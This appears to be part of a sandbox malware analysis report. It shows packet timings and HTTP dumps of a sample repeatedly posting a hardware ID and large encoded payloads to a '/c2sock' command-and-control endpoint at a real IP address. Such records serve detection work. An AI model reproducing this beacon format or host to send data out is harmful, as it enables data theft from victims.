                                                        Nov 13, 2024 10:55:36.919538975 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.919706106 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.971240997 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.971378088 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.019296885 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.019352913 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.066090107 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.066169024 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.115348101 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.115544081 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.171571016 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.171783924 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.224251032 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.224348068 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.285722017 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.285900116 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.336052895 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.336143970 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.391911983 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.391989946 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.437589884 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.437670946 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.486743927 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.486866951 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.535474062 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.535540104 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.585720062 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.585773945 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.645737886 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.645807028 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.712234974 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.712368011 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.769706964 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.769819021 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.836467981 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.836596012 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.888592005 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.888761044 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.938942909 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.939045906 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.985641956 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.985738039 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.034513950 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.034662962 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.081949949 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.082094908 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.129697084 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.129793882 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.178145885 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.178222895 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.225814104 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.225872040 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.273592949 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.273663998 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.324330091 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.324449062 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.373800039 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.373945951 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.427356005 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.427448034 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.473905087 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.474026918 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.523894072 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.523988962 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.570918083 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.571166992 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.621869087 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.621942043 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.671084881 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.671147108 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.717699051 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.717758894 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.765822887 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.765928984 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.786639929 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:39.820585012 CET4971680192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:39.827023029 CET804971694.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:39.827326059 CET4971680192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:39.827390909 CET4971680192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:39.827801943 CET4971680192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:39.832604885 CET804971694.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:39.832813978 CET804971694.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:48.326785088 CET804971694.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:48.326883078 CET4971680192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:48.327023029 CET4971680192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:48.335414886 CET804971694.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:48.608906984 CET4971780192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:48.615736961 CET804971794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:48.616281986 CET4971780192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:48.616439104 CET4971780192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:48.616862059 CET4971780192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:48.622174978 CET804971794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:48.622984886 CET804971794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:57.094016075 CET804971794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:57.094150066 CET4971780192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:57.094232082 CET4971780192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:57.099153042 CET804971794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:57.500457048 CET4971880192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:57.724580050 CET804971894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:57.724706888 CET4971880192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:57.724904060 CET4971880192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:57.725347042 CET4971880192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:57.729938984 CET804971894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:57.730076075 CET804971894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:06.203653097 CET804971894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:06.203780890 CET4971880192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:06.203780890 CET4971880192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:06.208606958 CET804971894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:06.574736118 CET4971980192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:06.579714060 CET804971994.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:06.579811096 CET4971980192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:06.579957008 CET4971980192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:06.580327034 CET4971980192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:06.584723949 CET804971994.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:06.585133076 CET804971994.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:15.057467937 CET804971994.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:15.057549000 CET4971980192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:15.057626009 CET4971980192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:15.062511921 CET804971994.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:15.353727102 CET4972080192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:15.359919071 CET804972094.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:15.360023022 CET4972080192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:15.360138893 CET4972080192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:15.360508919 CET4972080192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:15.366242886 CET804972094.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:15.366858006 CET804972094.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:23.838267088 CET804972094.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:23.838413954 CET4972080192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:23.838460922 CET4972080192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:23.843358994 CET804972094.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:24.122925043 CET4972180192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:24.127931118 CET804972194.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:24.127994061 CET4972180192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:24.128138065 CET4972180192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:24.128518105 CET4972180192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:24.133198023 CET804972194.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:24.133855104 CET804972194.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:32.618824005 CET804972194.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:56:32.618907928 CET4972180192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:32.618973017 CET4972180192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:56:32.624000072 CET804972194.158.244.69192.168.2.8

                                                        HTTP Request Dependency Graph

                                                        • 94.158.244.69

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.84970794.158.244.69807500C:\Users\user\Desktop\I2BJhmJou4.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:54:25.872971058 CET190OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 16465
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:54:25.873425007 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
                                                        Nov 13, 2024 10:54:25.877830982 CET1236OUTData Raw: 49 0f 2e 26 89 86 bb a8 52 0c 3f 7d 83 4d 58 df 15 7e 4d 5a 0f 4e 8b d2 cc 4c 66 bf 18 31 16 15 6f b9 0e 66 a5 f8 d0 b3 b1 86 64 54 46 1e 63 26 01 a9 45 9b b6 3b af d9 cc 1a e2 8b 33 9f df 0f ce 7a fe 44 ee 6f 43 22 06 61 37 cd 48 12 85 42 6b eb
                                                        Data Ascii: I.&R?}MX~MZNLf1ofdTFc&E;3zDoC"a7HBk4;`{B~6K`{b,%JjLmoR?;AswFgbs!NN7<PR`ASff5q(cfE+)jTq8"mP>DiEQ
                                                        Nov 13, 2024 10:54:25.878357887 CET4105OUTData Raw: 00 00 00 e9 03 fb 7f 00 00 00 20 7d 60 ff 0f 00 00 00 a4 0f ec ff 01 00 00 80 f4 81 f5 1f 00 00 00 48 1f 58 ff 01 00 00 80 f4 81 df ff 01 00 00 80 f4 91 1f 78 53 c8 65 35 41 fc 87 dc ff e6 e6 b3 5a ff 5f 0e d4 04 00 c0 d7 c5 fe dc 07 a2 f4 e4 49
                                                        Data Ascii: }`HXxSe5AZ_I&k6=iU=vOj2xcfqTVH#P-RkRB])>t'+./$=^hNgC6PAvxUxqE;I5/mP


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.84970894.158.244.69807500C:\Users\user\Desktop\I2BJhmJou4.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:54:34.823267937 CET190OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 19013
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:54:34.824714899 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
                                                        Nov 13, 2024 10:54:34.828789949 CET1236OUTData Raw: ec 59 b4 31 f7 2c dc f7 8b 04 fd d8 c2 4e e2 ef 92 a2 c8 38 a1 dd 95 44 b4 40 ce 4e c9 51 26 24 a0 46 e3 cc d7 7c 7b b8 71 8e 6b 5d b8 50 dd 37 47 e3 0d 89 76 69 aa 31 33 34 d7 72 76 9d 43 01 ab f9 51 66 36 9a 76 96 dc e9 46 05 fd 66 6a d9 e3 d3
                                                        Data Ascii: Y1,N8D@NQ&$F|{qk]P7Gvi134rvCQf6vFfjE{}C?:ewS%~F0ti)14r-A3rZ(;"heda?:>;.B%+RU)D(R*U>*Q*>
                                                        Nov 13, 2024 10:54:34.829701900 CET2472OUTData Raw: 60 76 40 1b c6 f7 fc 23 dc 38 87 11 d5 76 30 29 ee 41 cc b9 73 a9 87 e7 91 57 d5 a3 fc 40 1f d5 d6 ed bb 4a a3 b5 bd 56 d6 44 cc d5 b5 9f d0 b6 8e dc 78 b6 ef 96 c7 bd f9 44 97 b9 d6 da da 81 17 e3 72 c9 f2 18 33 d7 94 e5 72 73 1b 35 c1 db 9f 58
                                                        Data Ascii: `v@#8v0)AsW@JVDxDr3rs5X>-~40aNDpnKoJoR,5XI:a?B?\,aKjK%R/, XX<``8]2Rh
                                                        Nov 13, 2024 10:54:34.829737902 CET4181OUTData Raw: 9a 02 a6 5d 58 50 55 cf c0 1e c2 18 eb ea b6 eb b8 7b c1 79 3f 48 48 84 9d c4 df 25 76 14 ee 90 28 3e ef 84 bd ca 7e e5 fa 34 82 bf 32 8a e1 05 fe da d5 f5 ab f7 37 bf 76 eb 11 8e 88 24 ae 22 a4 99 9a 62 2a 9a 29 f6 9f 69 76 cc 66 cd a4 d9 23 e2
                                                        Data Ascii: ]XPU{y?HH%v(>~427v$"b*)ivf#JfxWP\XQ$u(JXoqDQVu6cMy8,U5vtwp#l`V/}()l"*5}e=`"4a0rfE[e7hLXCXT


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.84970994.158.244.69807500C:\Users\user\Desktop\I2BJhmJou4.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:54:44.482758999 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:54:44.484832048 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.84971094.158.244.69807500C:\Users\user\Desktop\I2BJhmJou4.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:54:53.728033066 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:54:53.728033066 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.84971294.158.244.69807500C:\Users\user\Desktop\I2BJhmJou4.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:55:02.510430098 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:55:02.510850906 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.84971394.158.244.69807500C:\Users\user\Desktop\I2BJhmJou4.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:55:12.140882969 CET190OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 20174
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:55:12.141294956 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;
                                                        Nov 13, 2024 10:55:12.145782948 CET1236OUTData Raw: d8 aa b4 b2 76 0f 56 57 5a b3 5e cc 4f c5 dd 5d 3b f3 ee 07 40 d7 33 ac 55 cb d8 d8 63 ef cb 8c 3e 7f 60 ab ab ad bb 67 ed 0b ad 3b e6 b6 e5 d4 cf 0d 8e 9e 38 d4 bd 7e ac 24 5d 2a 45 d3 dc 5e 1e 7b 27 dd ba e9 46 ee 53 b2 73 33 af 4b ce ed 6d bd
                                                        Data Ascii: vVWZ^O];@3Uc>`g;8~$]*E^{'FSs3Kmr-n3|A/VKEoGo=}ur/?kS=>37U|uj\_uqQ+y#S|XH;+r=Z7:6}^fsnGWFGJz>Z6mfa
                                                        Nov 13, 2024 10:55:12.146226883 CET4944OUTData Raw: f1 34 5e 78 ee d8 83 13 f5 da b1 4b 97 2e e7 f7 dd fa d8 fd 7f fb 85 e4 4b a9 db 82 e7 df 75 df e3 fa 6b a5 c9 66 a3 b8 69 88 ce cd 4e e5 2f bd fc f4 13 53 47 9e 3c b5 ef d6 8f bf 79 ef c7 92 e7 d3 b7 05 13 ef ba ee c2 64 b5 d9 d8 54 ed 7d 4f 55
                                                        Data Ascii: 4^xK.KukfiN/SG<ydT}OUO,/>X<YwWM/$?9UsFutx33jT+tguMBdz9{n8ShVi6}bQTG__fjTz5T,^_~j
                                                        Nov 13, 2024 10:55:12.146281004 CET2870OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.84971494.158.244.69807500C:\Users\user\Desktop\I2BJhmJou4.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:55:21.137038946 CET189OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 1136
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:55:21.137424946 CET1136OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.84971594.158.244.69807500C:\Users\user\Desktop\I2BJhmJou4.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:55:30.297111988 CET191OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 610895
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:55:30.297679901 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;
                                                        Nov 13, 2024 10:55:30.301961899 CET1236OUTData Raw: a4 79 1f 2d f5 bf e4 19 c1 4d bb de 12 cd f8 5f a5 60 9d a0 cd 01 f3 d6 f9 35 ea 7f f9 93 e8 65 a9 e7 57 a3 fd bd 86 07 9a d6 17 9e 6b a9 dd 1b 65 f3 b3 c2 de 57 4d 79 6e bb a6 da 44 8f 71 70 df 91 96 7e e2 a0 0e 50 ce fb d5 fd bf c6 fc 8f 0f ff
                                                        Data Ascii: y-M_`5eWkeWMynDqp~P^i*km<>k]5.>WW5gUtsH5w2resy:jbRzrQM_$o\Xi,TcyJ$}Ey2T+sV-rf-5Q-YW
                                                        Nov 13, 2024 10:55:30.302638054 CET2472OUTData Raw: 46 fc ef ee 1d 87 a4 26 cb ff b4 e1 05 91 c6 07 fb a3 ff d9 6c 30 74 c1 6d 86 a4 86 de 67 db 47 ff 93 49 b2 3f 73 5f ee fa bf 31 c3 c2 7a 3f 69 7f 61 84 fb 99 d1 06 18 98 1f bd 6f ca 96 c3 f4 23 a2 6d 10 fb 71 1c c6 27 c2 fd 66 78 7c 22 ea 09 11
                                                        Data Ascii: F&l0tmgGI?s_1z?iao#mq'fx|"L3t@jd|<iuf4B8,fxdjJNMPAY'G'5t8kuNv9s??u
                                                        Nov 13, 2024 10:55:30.302700043 CET4944OUTData Raw: ce fc 95 3d c1 e6 73 3d 0b 44 f4 f9 b2 7e 8f fe 07 df e3 7e 5a 1f 7d 0f 8f 53 36 1d 19 fa 9f 34 43 9a 1f 0d 90 fe 07 c7 93 7d c0 d2 04 6d fb 64 6d a0 e9 7f d8 a7 cf 0b 6a fa 58 d7 27 0d 0f c7 cc 7e 5f e9 77 66 ff 2f 3c cf 9c f3 cb f5 01 e5 1a 80
                                                        Data Ascii: =s=D~~Z}S64C}mdmjX'~_wf/<2d}?Y7d_Ou9s?9s?;OfZ,fO`?>73?5eqlf#-T#|y>\Wn6<5|
                                                        Nov 13, 2024 10:55:30.302721977 CET2472OUTData Raw: ff 46 47 6e f9 b3 c8 11 f5 f3 ee 3e c9 fb ef 96 b3 bd 7f fb 5c 66 37 40 18 d8 93 c2 c6 18 1a d9 ac 4b 7d 53 c3 23 0c ed ae 7e 3f 78 ce dc 65 5c cb f0 5c c6 76 4e 52 6e f0 72 67 f0 3a 78 ed a4 d7 7f d2 fb 6c d3 4f ac 86 fb 78 ee e3 67 f9 d7 e3 5e
                                                        Data Ascii: FGn>\f7@K}S#~?xe\\vNRnrg:xlOxg^PQgYQ'8eK(7oo pybYGl;,rsWtPQo;~EY<qnnt>@85
